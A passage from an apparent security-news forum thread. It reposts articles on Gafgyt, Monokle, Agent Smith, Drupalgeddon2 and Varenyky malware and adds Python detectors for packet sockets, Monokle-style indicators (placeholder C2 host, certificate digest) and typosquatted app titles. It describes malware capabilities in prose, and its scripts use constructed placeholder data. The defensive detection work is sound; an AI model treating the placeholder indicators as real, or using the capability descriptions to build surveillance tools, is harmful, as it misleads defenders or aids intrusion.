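    with open("/proc/net/packet") as fh:
        text = fh.read()
    fd_links, comm = {}, {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            fd_dir = f"/proc/{pid}/fd"
            fd_links[int(pid)] = [os.readlink(f"{fd_dir}/{fd}") for fd in os.listdir(fd_dir)]
            with open(f"/proc/{pid}/comm") as fh:
                comm[int(pid)] = fh.read().strip()
        except OSError:
            continue
    return parse_proc_net_packet(text), fd_links, comm


def describe(o):
    return (f"pid {o['pid']} ({o['comm']}) uid {o['uid']} "
            f"{SOCK_TYPES.get(o['type'], o['type'])} "
            f"{PROTO_NAMES.get(o['proto'], hex(o['proto']))} ifindex {o['ifindex']}")


if __name__ == "__main__":
    owners = attribute(parse_proc_net_packet(SAMPLE_PACKET), SAMPLE_FDS, SAMPLE_COMM)
    for o in suspicious(owners):
        print("unexpected packet socket:", describe(o))
```

On a live host, `attribute(*collect_live())` replaces the constructed inputs. A socket in the table with no owner in any fd directory is itself a finding: either the reader lacked permission for that process, or something is hiding its descriptors.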
  17. Gafgyt has been updated with new capabilities, and it spreads by killing rival malware. Tens of thousands of Wi-Fi routers are potentially vulnerable to an updated form of malware which takes advantage of known vulnerabilities to rope these devices into a botnet for the purposes of selling distributed denial of service (DDoS) attack capabilities to cyber criminals. A new variant of Gafgyt malware – which first emerged in 2014 – targets small office and home routers from well known brands, gaining access to the devices via known vulnerabilities. Now the authors of Gafgyt – also known as Bashlite – have updated the malware and are directing it at vulnerabilities in three wireless router models. The Huawei HG532 and Realtek RTL81XX were targeted by previous versions of Gafgyt, but now it's also targeting the Zyxel P660HN-T1A. In all cases, the malware is using a scanner function to find units facing the open internet before taking advantage of vulnerabilities to compromise them. The new attacks have been detailed by cybersecurity researchers at Palo Alto Networks. The Gafgyt botnet appears to be directly competing with another botnet – JenX – which also targets the Huawei and Realtek routers, but not Zyxel units. Ultimately, the attackers behind Gafgyt want to kill off their competition by replacing JenX with their own malware. "The authors of this malware want to make sure their strain is the only one controlling a compromised device and maximizing the device's resources when launching attacks," Asher Davila, security researcher at the Palo Alto Networks Unit 42 research division told ZDNet. "As a result, it is programmed to kill other botnet malware it finds, like JenX, on a given device so that it has the device's full resources dedicated to its attack". Control of the botnet allows its gang to launch DDoS attacks against targets in order to cause disruption and outages. 
While the malware could be used to launch denial of service campaigns against any online service, the current incarnation of Gafgyt appears to focus on game servers, particularly those running Valve Source Engine games, including popular titles Counter-Strike and Team Fortress 2. Often the targeted servers aren't hosted by Valve, but rather are private servers hosted by players. The most common reason for attacks is plain sabotage of other users: some young game players want to take revenge against opponents or rivals. Those interested in these malicious services don't even need to visit underground forums to find them – Unit 42 researchers note that botnet-for-hire services have been advertised using fake profiles on Instagram and can cost as little as $8 to hire. Researchers have alerted Instagram to the accounts advertising malicious botnet services. "There's clearly a younger demographic that they can reach through that platform, which can launch these attacks with little to no skill. It is available to everyone and is easier to access than underground sites," said Davila. As more IoT products become connected to the internet, it's going to become easier for attackers to rope devices into botnets and other malicious activity if devices aren't kept up to date. The routers being targeted by the new version of Gafgyt are all old – some have been on the market for more than five years. Researchers recommend upgrading your router to a newer model and regularly applying software updates to ensure the device is as protected as possible against attacks. "In general, users can stay safe against botnets by getting in the habit of updating their routers, installing the latest patches and implementing strong, unguessable passwords," Davila explained. "The more frequent the better, but perhaps for simplicity, considering timing router updates around daylight savings so at least you're updating twice a year," he added. 
Source: This aggressive IoT malware is forcing Wi-Fi routers to join its botnet army (via ZDNet)
  18. Apple has confirmed that 17 malware iPhone apps were removed from the App Store after successfully hiding from the company’s app review process. The apps were all from a single developer but covered a wide range of areas, including a restaurant finder, internet radio, BMI calculator, video compressor, and GPS speedometer … The apps were discovered by mobile security company Wandera, which said that the apps did what they claimed while secretly committing fraud in the background. Although no direct harm was done to app users, the activity would be using up mobile data, as well as potentially slowing the phone and accelerating battery drain. Wandera said the malware iPhone apps evaded Apple’s review process because the malicious code was not found within the app itself, but the apps were instead getting instructions on what to do from a remote server. Apple says it is improving its app review process to detect this approach. The same server was also controlling Android apps. In at least one of those cases, weaker security in Android meant that the app was able to do more direct harm. The apps were all from AppAspect Technologies. iOS aims to guard against this by sandboxing. Each app gets its own private environment, so cannot access system data or data from other apps unless using processes specifically permitted and monitored by iOS. However, Wandera cautions that there have been examples of the sandbox failing, giving three examples of this. Wandera is the same company that warned how a Siri feature could be used for phishing non-technically knowledgeable iPhone users. Apple confirmed the removal of the 17 apps to ZDNet.
Source:
1. 17 malware iPhone apps removed from App Store after evading Apple’s review (via 9to5Mac) - Main article
2. Trojan malware infecting 17 apps on the App Store (via Wandera) - Main reference to the article
p/s: The list of 17 apps mentioned in the article is as follows:
  19. A new report -- Webroot Threat Report: Mid-Year Update -- has found that one in 50 URLs are malicious, nearly one-third of phishing sites use HTTPS and Windows 7 exploits have grown 75 percent since January 2019. According to the report, hackers are using trusted domains and HTTPS to trick victims. Nearly a quarter (24 percent) of malicious URLs were found to be hosted on trusted domains, as hackers know trusted domain URLs raise less suspicion among users and are more difficult for security measures to block. 1 in 50 URLs (1.9 percent) were found to be malicious, which is high, the report says, given that nearly a third (33 percent) of office workers click more than 25 work-related links per day. Nearly a third (29 percent) of detected phishing web pages use HTTPS as a method to trick users into believing they're on a trusted site via the padlock symbol. Phishing continued rapid growth into 2019, and criminals are expanding their phishing targets. Phishing grew rapidly, with a 400-percent increase in URLs discovered from January to July 2019. The top industries impersonated by phishing include:
- 25 percent are SaaS/Webmail providers
- 19 percent are financial institutions
- 16 percent are social media
- 14 percent are retail
- 11 percent are file hosting
- Eight percent are payment services companies
Phishing lures are becoming increasingly personalized as more PII is collected from breaches. Phished passwords are used for more than account takeover. Specifically, extortion emails are being used, claiming the user has been caught doing something embarrassing or damaging that will be shared with colleagues, friends and family unless a ransom is paid, the report says. Phishing doesn't always target usernames and passwords. The attacks also go after secret questions and their answers, says the report. Windows 7 is becoming even riskier, with infections increasing by 71 percent. 
- Between January and June, the number of IPs that host Windows exploits grew 75 percent
- Malware samples seen on only one PC are at 95.2 percent, up from 91.9 percent in 2018
- Out of all infected PCs, 64 percent were home user machines, and 36 percent were business devices.
More at: (Webroot) Source
  20. Hackers continue to target the Drupal vulnerability named Drupalgeddon2 to install malware onto unpatched systems, Akamai’s security researchers have discovered. Tracked as CVE-2018-7600, the security flaw impacts Drupal versions 6, 7 and 8. The bug was addressed in March 2018, with the first attacks targeting it spotted only several weeks later, attempting to deploy malicious programs such as crypto-miners and backdoors. Now, Akamai security researcher Larry W. Cashdollar reveals that the vulnerability continues to be targeted in a recently observed malicious campaign where attackers attempt to run code embedded in a .gif file. Although not widespread, the campaign appears to be targeting a broad range of high profile websites, without a focus on a specific industry. One of the analyzed .gif files was hosted on a compromised bodysurfing website located in Brazil. The file contains obfuscated PHP code designed to decode base64-encoded malware stored in a variable. The researcher discovered that the malware could scan for credentials stored in local files, send email with the discovered credentials, replace the local .htaccess file, display MySQL my.cnf configuration files, execute a remote file, show system information, rename files, upload files, and launch a web shell. In addition to the .gif, the attack drops a piece of malware stored in a .txt in the form of a Perl script. This malicious program uses Internet Relay Chat (IRC) for command and control (C&C) communication. The threat can launch distributed denial-of-service (DDoS) attacks, but also functions as a remote access Trojan (RAT). It can connect to a now defunct IRC server and join a specific channel to receive commands. Functionality included in the malware allows it to gather information from the local system and provide attackers with control over it. 
It also supports a SQL flood command, which allows the malware operators to send generic HTTP GET requests to MySQL’s default port, 3306, on the specified target. “This piece of code has been widely shared and modified by the criminal Internet underground,” Cashdollar says. The new campaign underlines once again the importance of maintaining good security hygiene, which also involves patching in a timely manner. The targeted Drupalgeddon2 vulnerability is a year and a half old and can be easily exploited, which creates great risks for enterprise environments with unpatched systems, as scanning and infection attacks can be automated. “Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take,” the researcher concludes. Source
  21. Brian12

    Malware Removal Guide

    "This guide will help you remove malicious software from your computer. If you think your computer might be infected with a virus or trojan, you may want to use this guide. It provides step-by-step instructions on how to remove malware from Windows operating system. It highlights free malware removal tools and resources that are necessary to clean your computer. You will quickly learn how to remove a virus, a rootkit, spyware, and other malware." Guide: http://www.selectrealsecurity.com/malware-removal-guide I'll be posting updates. :)
  22. Security researchers discovered a new form of malware that specifically targeted users of a French telecom giant. One of the more disturbing features of this malware is its capability to identify when someone was likely viewing porn and record their screen. Researchers at IT security company ESET spotted the malware, which they named Varenyky, in May of this year, and in July, operators of the malware launched their first sextortion scam. The malware targets customers of Orange S.A., a French internet service provider, and filters out non-French users based on the location of someone’s computer. According to the researchers, the malware is sent in the form of an email with a fake Microsoft Word attachment under the guise of a €491.27 bill. The document is actually malware, and opening it infects the user’s computer. The researchers pointed out that the hackers routinely tweaked and added commands to the malware, and that a recent version deployed a hidden desktop on someone’s computer that was able to navigate menus, read text, take screenshots, click on the screen, adjust windows, and even record the screen’s activity. One feature the researchers spotted in one version of the malware was that it would search for porn-related words in French in a user’s window and subsequently record the screen and upload it to the command and control server, which is a computer that can send instructions to a device infected with malware. The researchers noted, though, that while the malware is capable of recording someone’s screen while they watch porn, they didn’t find any evidence indicating that the hackers exploited these recordings beyond collecting them. That being said, in July, the hackers did deploy a sextortion scam—in which someone was blackmailed through sexual material. 
The sextortion scam is also sent in the form of an email and informs the recipient that a virus infected their computer when they were watching porn, and that the hackers have gained access to their computer. The scammer also claims that they have a video of both the porn the victim was watching as well as a recording from their webcam of “you having… fun.” The scammer says that if they don’t pay them €750 in bitcoin within 72 hours, they’ll send the video to family, coworkers, and post it on social media. “This offer is non-negotiable, do not waste my time and yours, think about the consequences of your actions,” it states in the email sign-off. The researchers said that one bot can send up to 1,500 emails in an hour, and as of August 8, the bitcoin address included in the sextortion email had received four payments. Sextortion campaigns and phishing attacks that can give a hacker access to your desktop are hardly unique forms of online exploitation, but this newly spotted malware indicates that they aren’t going anywhere and that people are still easily duped by inarguably unsettling threats. The researchers also note that the operators of this malware tweaked it a lot over the course of two months, indicating that they “are inclined to experiment with new features that could bring a better monetization of their work.” In this case, that means finding the best way to scare French internet users into paying a gross grifter in return for peace of mind. Source
  23. Advanced mobile surveillanceware, made in Russia, found in the wild
Monokle infected Android devices, but evidence suggests iOS versions may also exist.
Researchers have discovered some of the most advanced and full-featured mobile surveillanceware ever seen. Dubbed Monokle and used in the wild since at least March 2016, the Android-based application was developed by a Russian defense contractor that was sanctioned in 2016 for helping that country’s Main Intelligence Directorate meddle in the 2016 US presidential election. Monokle uses several novel tools, including the ability to modify the Android trusted-certificate store and a command-and-control network that can communicate over Internet TCP ports, email, text messages, or phone calls. The result: Monokle provides a host of surveillance capabilities that work even when an Internet connection is unavailable. According to a report published by Lookout, the mobile security provider that found it, Monokle is able to:
- Retrieve calendar information including name of event, when and where it is taking place, and description
- Perform man-in-the-middle attacks against HTTPS traffic and other types of TLS-protected communications
- Collect account information and retrieve messages for WhatsApp, Instagram, VK, Skype, imo
- Receive out-of-band messages via keywords (control phrases) delivered via SMS or from designated control phones
- Send text messages to an attacker-specified number
- Reset a user’s pincode
- Record environmental audio (and specify high, medium, or low quality)
- Make outgoing calls
- Record calls
- Interact with popular office applications to retrieve document text
- Take photos, videos, and screenshots
- Log passwords, including phone unlock PINs and key presses
- Retrieve cryptographic salts to aid in obtaining PINs and passwords stored on the device
- Accept commands from a set of specified phone numbers
- Retrieve contacts, emails, call histories, browsing histories, accounts and corresponding passwords
- Get device information including make, model, power levels, whether connections are over Wi-Fi or mobile data, and whether screen is on or off
- Execute arbitrary shell commands, as root, if root access is available
- Track device location
- Get nearby cell tower info
- List installed applications
- Get nearby Wi-Fi details
- Delete arbitrary files
- Download attacker-specified files
- Reboot a device
- Uninstall itself and remove all traces from an infected phone
Commands in some of the Monokle samples Lookout researchers analyzed lead them to believe that there may be versions of Monokle developed for devices running Apple’s iOS. Unused in the Android samples, the commands were likely added unintentionally. The commands controlled iOS functions for the keychain, iCloud connections, iWatch accelerometer data, iOS permissions, and other iOS features or services. Lookout researchers didn’t find any iOS samples, but they believe iOS versions may be under development. Monokle gets its name from a malware component a developer titled "monokle-agent." From Russia with… Lookout researchers were able to tie Monokle to Special Technology Centre Ltd. (STC), a St. Petersburg, Russia, defense contractor that was sanctioned in 2016 by then-President Obama for helping Russia’s GRU, or Main Intelligence Directorate, meddle in the 2016 election. Evidence linking Monokle to the contractor includes control servers the malware connects to and cryptographic certificates that sign the samples. Both are identical to those used by Defender, an Android antivirus app developed by STC. Monokle’s sophistication, combined with its possible use in nation-sponsored surveillance, evokes memories of Pegasus, a powerful set of spying apps developed for both iOS and Android devices. Developed by Israel-based NSO Group, Pegasus was used in 2016 against a dissident of the United Arab Emirates and again this year against a UK-based lawyer. 
Lookout researchers found Monokle folded into an extremely small number of apps, an indication the surveillance tool is used in highly targeted attacks on a limited number of people. Most of the apps contained legitimate functionality to prevent users from suspecting the apps are malicious. Based on the app titles and icons of the apps, Lookout believes targets were likely:

• interested in Islam
• interested in Ahrar al-Sham, a militant group fighting against the Syrian government and Bashar al-Assad
• living in or associated with the Caucasus regions of Eastern Europe
• interested in a messaging application called “UzbekChat” referencing the Central Asian nation and former Soviet republic Uzbekistan

Many of the icons and titles have been stolen from legitimate applications to disguise Monokle’s purpose.

[Image: Lookout]

Other titles used familiar words like Google Update, Flashlight, and Security Update Service to appear innocuous to the intended target. Titles are mostly in English with a smaller number in Arabic and Russian. While only a small number of samples have been found in the wild, a larger number of samples date back as long ago as 2015. As the graph below shows, they follow a fairly regular development cycle.

[Figure: Signing dates of Monokle samples. Lookout]

STC is best known for developing radio frequency measurement equipment and unmanned aerial vehicles. It claims to employ 1,000 to 5,000 people. It develops a suite of Android security products, including Defender, that are intended for government customers. Lookout monitored Russian job search sites for positions open at STC and found they required experience in both Android and iOS. As noted earlier, the control servers and signing certificates used by the Android defensive software were in many cases identical to those used by Monokle. Monokle’s design is consistent with a professional development company that sells to governments.
The surveillanceware defines 78 separate tasks—including “gathers call logs,” “collects SMS messages,” “collects contacts,” and “gets list of files in particular system directories”—that control servers can send through SMS, email, or TCP connections. Control phrases used to invoke the commands—including “connect,” “delete,” “location,” and “audio”—are short and vague enough that, should an end user see them appear in a text message, they aren’t likely to arouse suspicion. Infected phones can also receive calls from specific numbers that will turn off headsets and allow the device on the other end to record nearby sounds.

There are clear differences between Monokle and Pegasus, including the fact that the latter came packaged with powerful exploits that install the surveillance malware with little interaction required of the end user. By contrast, there are no accompanying exploits for Monokle, and Lookout researchers still aren’t sure how it gets installed. The chances of ordinary people being infected with either of these types of malware are extremely small. Still, Lookout’s report provides more than 80 so-called indicators of compromise that allow security products and more technically inclined end users to detect infections. Lookout customers have been protected against Monokle since early last year.

Source: Advanced mobile surveillanceware, made in Russia, found in the wild (Ars Technica)
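Lookout’s report ships more than 80 indicators of compromise, and the article notes that Monokle samples were tied to STC through shared signing certificates and that the implant can modify the trusted-certificate store. The script below is an added illustration of how such indicators are applied offline to an Android device inventory; it is not Lookout’s tooling and not code from the Ars Technica piece. It takes the package list as `adb shell pm list packages -f` prints it, the SHA-256 of each APK’s signing certificate as `apksigner verify --print-certs` reports it, the contents of the user-added CA directory, and observed connections. Every indicator, package name, digest, hostname and listing in it is a constructed placeholder, not a real Monokle indicator.

```python
"""Offline triage of an Android package inventory against Monokle-style indicators.

Added example; not Lookout's tooling and not code from the article. Every
indicator, package name, digest, hostname and listing below is a constructed
placeholder, not a real Monokle IOC. Real indicators come from Lookout's report.
"""
import re

# --- Constructed IOC set (hypothetical values) ---
IOC_PACKAGES = {"com.example.securityupdateservice", "com.example.flashlight.pro"}
# The article ties Monokle samples to STC through shared signing certificates, so a
# certificate digest is a stronger indicator than a package name. Hypothetical digest.
IOC_CERT_SHA256 = {"0a" * 32}
IOC_C2_HOSTS = {"c2.example.invalid"}

# --- Constructed device inventory ---
# What `adb shell pm list packages -f` prints: package:<apk path>=<package name>
PM_LIST = """\
package:/system/app/Bluetooth/Bluetooth.apk=com.android.bluetooth
package:/data/app/com.example.flashlight.pro-1/base.apk=com.example.flashlight.pro
package:/data/app/com.whatsapp-2/base.apk=com.whatsapp
package:/data/app/com.example.googleupdate-1/base.apk=com.example.googleupdate
"""

# Signing-cert SHA-256 per package, as `apksigner verify --print-certs` reports it.
CERT_DIGESTS = {
    "com.example.flashlight.pro": "0a" * 32,
    "com.example.googleupdate": "0a" * 32,   # same key as a known sample, different name
    "com.whatsapp": "ff" * 32,
}

# Files in /data/misc/user/0/cacerts-added/ (user-installed CAs). Monokle is reported
# to modify the trusted-certificate store, so any entry the owner did not add matters.
USER_ADDED_CAS = ["1a2b3c4d.0"]

# (package, remote host, remote port) as resolved from `ss -tnp`-style output. Constructed.
CONNECTIONS = [
    ("com.whatsapp", "chat.example.net", 443),
    ("com.example.googleupdate", "c2.example.invalid", 4433),
]

PM_LINE = re.compile(r"^package:(?P<apk>\S+?)=(?P<pkg>[\w.]+)$")


def parse_pm_list(text):
    """Map package name -> APK path from `pm list packages -f` output."""
    pkgs = {}
    for line in text.splitlines():
        m = PM_LINE.match(line.strip())
        if m:
            pkgs[m.group("pkg")] = m.group("apk")
    return pkgs


def triage(pm_text, cert_digests, user_cas, connections):
    """Return (severity, item, reason) findings; highs are direct IOC matches."""
    findings = []
    for pkg, apk in parse_pm_list(pm_text).items():
        if pkg in IOC_PACKAGES:
            findings.append(("high", pkg, f"package name on IOC list ({apk})"))
        digest = cert_digests.get(pkg)
        if digest in IOC_CERT_SHA256:
            # Catches renamed or re-packaged samples that keep the signing key.
            findings.append(("high", pkg, f"signed with IOC certificate {digest[:16]}..."))
        elif apk.startswith("/data/app/") and digest is None:
            findings.append(("low", pkg, "third-party app with no recorded signing cert"))
    for ca in user_cas:
        findings.append(("medium", ca, "user-added CA in trusted store"))
    for pkg, host, port in connections:
        if host in IOC_C2_HOSTS:
            findings.append(("high", pkg, f"connection to IOC host {host}:{port}"))
    return findings


def verdict(findings):
    """'infected' on any high finding, 'suspicious' on lower ones only, else 'clean'."""
    severities = {sev for sev, _, _ in findings}
    if "high" in severities:
        return "infected"
    return "suspicious" if severities else "clean"


if __name__ == "__main__":
    hits = triage(PM_LIST, CERT_DIGESTS, USER_ADDED_CAS, CONNECTIONS)
    for sev, item, why in hits:
        print(f"[{sev:>6}] {item}: {why}")
    print("verdict:", verdict(hits))
```

Swap the placeholder sets for the published indicators and feed real `adb` output. The certificate check is the one worth keeping even when names change: titles such as Google Update or Flashlight are reused freely across samples, whereas a signing key is not, which is exactly how Lookout linked the implant to STC’s Defender app.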
  24. When you think of malware, it's understandable if your mind first goes to elite hackers launching sophisticated dragnets. But unless you're being targeted by a nation-state or advanced crime syndicate, you're unlikely to encounter these ultra-technical threats yourself. Run-of-the-mill profit-generating malware, on the other hand, is rampant. And the type you're most likely to encounter is adware. In your daily life you probably don't think much about adware, software that illicitly sneaks ads into your apps and browsers as a way of generating bogus revenue. Remember pop-up ads? It's like that, but with special software running on your device, instead of rogue web scripts, throwing up the ads. Advertisers often pay out based on impressions, or the number of people who load their ads. So scammers have realized that the more ads they can foist upon you, the more money they pocket.

Ad It Up

Your smartphone offers attackers the perfect environment to unleash ad malware. Attackers can distribute apps tainted with adware through third-party app stores for Android and even sneak adware-laced apps into the Google Play Store or Apple's App Store. They can reach millions of devices quickly, lurking on your phone, say, while their servers spew ads that run in the background of your device or right on the screen. It doesn't require elaborate hacking techniques. It isn't trying to steal your money. At worst, it makes your device a little slower or forces you to close out some unexpected ads. Adware could be on your phone right now. "With adware—which is in my opinion one of the boldest types of malware on the mobile front—we can see that the actors are basically following the money," says Aviran Hazum, analysis and response team leader at security firm Check Point. "A lot of victims will pay a ransomware ransom, or attackers can gain access to a bank account, but the probability of that is relatively low compared to the amount of money they can generate by displaying ads. 
More audience, more adware, more revenue." Strains of adware regularly infect tens of millions or even hundreds of millions of devices at a time. Even though adware detections have declined year over year, security firm Malwarebytes still ranked it as the most prevalent type of consumer malware in 2018. Check Point published findings on one example last week, dubbed Agent Smith, which infected more than 25 million Android devices around the world. Fifteen million of those are in India, but Check Point also found more than 300,000 infections in the US. Check Point sees signs that attackers started developing Agent Smith adware in 2016 and have been refining it ever since. Distributed largely through the third-party Android app store 9Apps, the adware was originally a more clunky, obvious type of malware that masqueraded as legitimate apps but asked for a suspicious number of device permissions to run and displayed a lot of intrusive ads. In spring 2018, though, Agent Smith evolved. Attackers added other malware components so that once the adware was installed, it would search through the device's third-party apps and replace as many as possible with malicious decoys. The initial malware would be in apps like shoddy games, photo services, or sex-related apps. But once installed, it would masquerade as a Google update utility—like a fake app called Google Updater—or apps that pretended to sell Google products, to have a better chance of hiding in plain sight. Agent Smith also infiltrated the Google Play Store during 2018, hidden in 11 apps that contained a software development kit related to the campaign. Some of these apps had about 10 million downloads in total, but the Agent Smith functionality was dormant and may have represented a planned next step for the actors. Google has removed these tainted apps. 
Check Point's Hazum points out that the actors behind Agent Smith also overhauled its infrastructure in 2018 and moved its command and control framework to Amazon Web Services. This way, the attackers could expand features like logging and more easily monitor analytics like download stats. Campaigns like adware and cryptojacker distribution can often function on legitimate infrastructure platforms like AWS, because it's difficult to distinguish their malicious activity from legitimate operations. In other recent adware campaigns, researchers have found innovations like malware that takes advantage of smartphone display and accessibility settings to overlay invisible ads that give them credit with ad networks without users even seeing anything. "You’re starting to see actors realizing that just regular adware won’t do these days," Check Point's Hazum says. "If you want the big money you need to invest in infrastructure and research and development."

It's an Ad, Ad, Ad, Ad World

Agent Smith is just one wave, though, in a sea of massive adware campaigns that impact hundreds of millions of users combined. For example, in late 2017, adware known as Fireball infected more than 250 million PCs. Imposter Fortnite apps started spreading adware on Android during the summer of 2018. And in April researchers found 50 adware-ridden apps in Google Play that had been downloaded more than 30 million times. Almost any popular app spawns adware clones almost immediately—even FaceApp. Though adware isn't necessarily an immediate threat to users, even when it's on their devices, it opens the door for attackers to add other malicious functionality in the future that could endanger users' data or accounts. And adware can also come bundled with other types of malware, portending worse attacks to come. 
“Specific to adware, a lot of the risk to the user comes in applications that download extra stuff or redirect users to other websites,” says Ronnie Tokazowski, a senior threat researcher at email security firm Agari. “Many forms of adware are sold through a pay-to-install model, so the more things that get installed on an end user’s phone or PC, the more the actor gets.” To avoid downloading adware in the first place, use official app stores to download software, stick to prominent, mainstream apps as much as possible, and always double-check that you're actually downloading, say, the real Twitter app and not Twltter. To eliminate adware that could already be on your device, go through your apps and delete anything you don't use anymore, or any apps that are particularly glitchy or ad-ridden, such as random games or utilities like flashlight apps. And if you want an outside opinion, you can download reputable adware scanners from antivirus companies like Bitdefender, Malwarebytes, or Avast. Most offer a free trial. But be careful to download the real deal—adware and other malware loves to hide in apps that pretend to be adware scanners. Adware isn't the powerful and deeply invasive malware that nation-state hackers specially craft for tailored reconnaissance or intimidation. But it's the malware most likely to show up on your phone, which makes it the type that's most important to look out for. Source
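Agent Smith hid behind titles like Google Updater, and the advice above comes down to spotting Twltter before it is installed. The script below is an added example (not code from WIRED, Check Point or Agari) of doing that check mechanically over an app inventory: it folds titles to a skeleton so confusable spellings compare equal, flags a title that is one edit away from a known brand, flags a brand title shipped under a package other than the real one, and flags Google- or update-sounding titles from packages outside the com.google/com.android namespaces. The brand catalogue, trusted prefixes, confusable table and sample inventory are constructed for illustration; the package names in the catalogue should come from store listings you trust, not from this example.

```python
"""Flag app titles that impersonate well-known apps or Google system components.

Added example, not code from WIRED, Check Point or Agari. The brand catalogue,
trusted package prefixes and sample inventory are constructed for illustration.
"""
import unicodedata

# Constructed catalogue: brand title -> package the real app ships under.
# Take these from the store listings you trust rather than from this example.
_RAW_KNOWN = {
    "Twitter": "com.twitter.android",
    "WhatsApp": "com.whatsapp",
    "Fortnite": "com.epicgames.fortnite",
    "FaceApp": "io.faceapp",
}
# Only these namespaces may legitimately carry Google/Android-sounding titles.
TRUSTED_PREFIXES = ("com.google.", "com.android.")
_RAW_SYSTEM_WORDS = ("google", "update", "security", "play services")

# Single characters attackers swap for look-alikes ("Twltter" for "Twitter").
_SINGLE = str.maketrans({"l": "i", "1": "i", "|": "i", "0": "o", "5": "s", "3": "e"})
# Digraphs that render like one letter.
_DIGRAPHS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalize(title):
    """Fold a title to a skeleton so confusable spellings compare equal."""
    t = unicodedata.normalize("NFKD", title)
    t = "".join(c for c in t if not unicodedata.combining(c)).lower()
    t = "".join(c for c in t if c.isalnum() or c == " ")
    for pair, single in _DIGRAPHS:
        t = t.replace(pair, single)
    return t.translate(_SINGLE).strip()


KNOWN = {normalize(k): v for k, v in _RAW_KNOWN.items()}
SYSTEM_WORDS = tuple(normalize(w) for w in _RAW_SYSTEM_WORDS)


def levenshtein(a, b):
    """Edit distance; one edit is the usual typosquat budget."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(title, package):
    """Return None if nothing is notable, else a short reason."""
    skel = normalize(title)
    # Same skeleton as a known brand but a different package: a clone or a confusable.
    if skel in KNOWN and KNOWN[skel] != package:
        return f"title impersonates {skel!r} (real package {KNOWN[skel]})"
    # One edit away from a known brand: a plain typosquat.
    for brand, pkg in KNOWN.items():
        if pkg != package and skel != brand and levenshtein(skel, brand) == 1:
            return f"look-alike of {brand!r}"
    # Google- or update-sounding title shipped from outside the trusted namespaces.
    if any(w in skel for w in SYSTEM_WORDS) and not package.startswith(TRUSTED_PREFIXES):
        return "system-sounding title from untrusted package"
    return None


# Constructed inventory of (title, package) pairs.
INVENTORY = [
    ("Twitter", "com.twitter.android"),                   # genuine
    ("Twltter", "com.example.twltter"),                   # 'l' for 'i'
    ("Twiter", "com.example.twiter"),                     # one letter dropped
    ("WhatsApp", "com.example.whatsapp.free"),            # brand name, wrong package
    ("Google Updater", "com.example.updater"),            # Agent Smith-style disguise
    ("Google Play services", "com.google.android.gms"),   # genuine
    ("Flashlight", "com.example.flashlight"),             # generic; nothing to match
]


def scan(inventory):
    """Return (title, package, reason) for every flagged entry."""
    flagged = []
    for title, package in inventory:
        reason = classify(title, package)
        if reason:
            flagged.append((title, package, reason))
    return flagged


if __name__ == "__main__":
    for title, package, reason in scan(INVENTORY):
        print(f"{title:22} {package:32} {reason}")
```

The skeleton step matters more than the edit-distance step: a plain distance check sees Twltter and Twitter as one edit apart, but so are many honest names, whereas after folding confusables the two become identical and the only remaining question is whether the package is the real one. Generic titles such as Flashlight are deliberately not flagged here; the article’s advice for those is to remove what you do not use.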
  25. The Oconee County Courthouse has been closed and computer servers at nearly every Oconee County government office have been compromised by software designed to disrupt computer systems, Sheriff Mike Crenshaw said Thursday afternoon. Government offices affected are along Pine Street in Walhalla, and they include the treasurer's office, the assessor, the auditor's office, administrative buildings and the solid waste division. It's not yet clear whether or how much residents' personal information may have been compromised as a result of the breach. "We're working to figure that out, and if it has been, we will notify people," Crenshaw said. The Oconee County Sheriff's Office and its 911 communications systems are among the only government agencies not affected because they operate on different computer servers, Crenshaw said. The Oconee County School District also has offices on Pine Street, but those systems are unaffected, he said. "The county basically had to shut down offices because most folks simply couldn't do business," he said. A team assessed the damage until Thursday evening. County Administrator Amanda Brock said in a prepared statement Thursday night that all Oconee County government offices would reopen Friday morning, but that "some offices may have limited resources" until computer systems are restored. The FBI and a computer-crimes unit of the State Law Enforcement Division have been called in to assist the Sheriff's Office and the county's information technology division with the investigation. It's not yet clear how the malware, or malicious software, made it past various firewalls used by the computer system. Crenshaw said the investigation is still in its early stages and many questions remain unanswered. Source